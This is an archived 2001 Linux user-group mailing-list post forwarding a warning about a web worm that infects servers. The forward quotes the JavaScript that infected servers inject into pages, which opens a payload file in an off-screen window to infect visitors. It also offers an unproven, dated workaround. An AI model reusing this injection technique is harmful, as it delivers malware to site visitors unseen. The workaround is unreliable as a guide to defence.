[lug] Fwd: New worm on the loose (Code Rainbow?)
Nate Duehr
nate at natetech.com
Tue Sep 18 12:43:45 MDT 2001
Must... Control.... Fist..OF..DEATH!
:-)
On Tue, Sep 18, 2001 at 12:41:48PM -0600, John Starkey wrote:
> >From a web dev list.
>
> ===================================================
>
> Even worse, this virus can be spread to users who simply surf to a web page
> on an infected server. A javascript is added to web pages served on infected
> servers, and this script launches a readme.eml file, which Internet Explorer
> then opens and executes.
>
> The code appended to infected web pages is:
>
> <!-- BEGIN
>
> <html><script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000 ")</script></html>
>
> -->
>
> Readme.eml contains the virus payload, and is launched via Javascript in a
> window at X6000 Y6000, ie., way off your screen so you can't see it. A
> quick, unproven workaround seems to be to associate .eml files with Notepad.
> IE still opens the new window, however, and I'm not certain if this is
> enough to infect.
>
> Note that an infected web server will have a "readme.eml" file on the server
> in root. That's a good way to check if your NT server is infected, I would
> think.
>
> This server worm uses exploits that have had patches for some time now. If
> you run Windows, you need to go to windowsupdate.com to make sure you are up
> to date with patches.
>
> =====================================================
> _______________________________________________
> Web Page: http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
--
Nate Duehr <nate at natetech.com>
GPG Key fingerprint = DCAF 2B9D CC9B 96FA 7A6D AAF4 2D61 77C5 7ECE C1D2
Public Key available upon request, or at wwwkeys.pgp.net and others.
More information about the LUG
mailing list